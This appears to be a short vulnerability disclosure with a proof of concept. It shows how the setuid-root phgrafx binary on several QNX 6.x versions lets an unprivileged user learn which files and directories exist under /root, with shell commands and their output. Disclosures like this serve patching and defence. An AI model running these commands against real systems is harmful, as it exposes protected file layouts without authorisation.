# QNX 6.x phgrafx file enumeration vulnerability by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/phgrafx allows any non-root user to enumerate
# files and directories due to opendir() messages.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
# QNX 6.3.0
# QNX 6.2.0
#
# - note:
# Leveraging this on QNX versions <= 6.3.0 will result in a core dump.
$ id
uid=100(user) gid=100
# directory /root/.ph exists:
$ /usr/photon/bin/phgrafx -d /root/.ph
load_display_conf(): No such file or directory
# file /root/.profile exsts:
$ /usr/photon/bin/phgrafx -d /root/.profile
/root/.profile: opendir(): Not a directory
load_display_conf(): Not a directory
# /root/doesnotexist does not exist:
$ /usr/photon/bin/phgrafx -d /root/doesnotexist
/root/doesnotexist: opendir(): No such file or directory
load_display_conf(): No such file or directory
|